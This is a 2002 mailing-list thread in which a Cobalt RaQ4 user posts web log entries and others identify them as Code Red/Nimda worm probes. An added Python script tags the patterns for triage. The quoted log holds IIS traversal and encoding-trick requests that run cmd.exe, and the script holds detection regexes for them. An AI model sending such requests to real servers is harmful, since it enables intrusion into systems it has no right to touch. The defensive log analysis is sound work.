Re: [cobalt-users] Raq4 Intrusion
- Subject: Re: [cobalt-users] Raq4 Intrusion
- From: Nell Bolen <nell@xxxxxxxxxxxxxx>
- Date: Thu Feb 14 10:45:21 2002
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
Torsten Ewald wrote:
>
> Hi,
> this means, that someone is scanning your server for activating a Code Red
> Virus which is only dangerous for a windows system. Because of your Linux
> System, you can reject this message. You can see, that someone is looking
> for Code Red by Requesting the program "root.exe".
>
> Regards
> Torsten
>
> ----- Original Message -----
> From: <lewis.tim@xxxxxxxxxx>
> To: <cobalt-users@xxxxxxxxxxxxxxx>
> Sent: Thursday, February 14, 2002 11:01 AM
> Subject: [cobalt-users] Raq4 Intrusion
>
> >
> > Hi
> > Any ideas on nature of this intrusion:-
> > "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 228 "-" "-"
> > "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 226 "-" "-"
> > "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 236 "-" "-"
> > "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 236 "-" "-"
> > "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 252 "-" "-"
> > "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 273 "-" "-"
> > "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 273 "-" "-"
> > "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 301 "-" "-"
> > "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 253 "-" "-"
> > "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 645 "-" "-"
> > "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 253 "-" "-"
> > "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 253 "-" "-"
> > "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
> > "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
> > "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 252 "-" "-"
> > "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 252 "-" "-"
> > thanks
> > Lewis
Actually, I think it's Nimda, which only adds to your access log. See
list archives for details.
Regards, Nell Bolen
nell@xxxxxxxxxxxxxx
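
An added example, not part of any message in this thread: a small Python triage script that tags the request patterns visible in the quoted log (paths ending in root.exe or cmd.exe, double percent-encoding such as %255c, overlong UTF-8 sequences such as %c0%af) and tallies the status codes the server returned for them. The tag names and regexes are this example's own assumptions; the sample lines are copied from the quoted log, plus one constructed benign request.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Lines copied from the log quoted in the thread, plus one constructed benign line.
SAMPLE = [
    '"GET /scripts/root.exe?/c+dir HTTP/1.0" 302 228 "-" "-"',
    '"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 236 "-" "-"',
    '"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 252 "-" "-"',
    '"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 253 "-" "-"',
    '"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"',
    '"GET /index.html HTTP/1.0" 200 1043 "-" "-"',  # constructed benign request
]

LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')
TARGET = re.compile(r'/(root|cmd)\.exe$', re.I)      # Windows shell binaries
OVERLONG = re.compile(r'%c[01]%[0-9a-f]{2}', re.I)   # 2-byte overlong UTF-8 (lead C0/C1)
TRAVERSAL = re.compile(r'\.\.[/\\]')

def classify(line):
    """Return (status, set_of_tags) for one log line, or None if it does not parse."""
    m = LINE.search(line)
    if not m:
        return None
    path = m['uri'].split('?', 1)[0]
    tags = set()
    if TARGET.search(path):
        tags.add('windows-shell-target')
    if OVERLONG.search(path):
        tags.add('overlong-utf8')
    # latin-1 maps every byte to a character, so odd escapes never raise.
    once = unquote(path, encoding='latin-1')
    twice = unquote(once, encoding='latin-1')
    if twice != once:                 # a second decoding pass still changed the path
        tags.add('double-encoded')
    if TRAVERSAL.search(twice):
        tags.add('dot-dot-traversal')
    return m['status'], tags

def summarize(lines):
    """Count tags and response codes over the lines that were flagged."""
    tags, statuses = Counter(), Counter()
    for result in filter(None, map(classify, lines)):
        if result[1]:
            tags.update(result[1])
            statuses[result[0]] += 1
    return tags, statuses

if __name__ == '__main__':
    print(summarize(SAMPLE))
```
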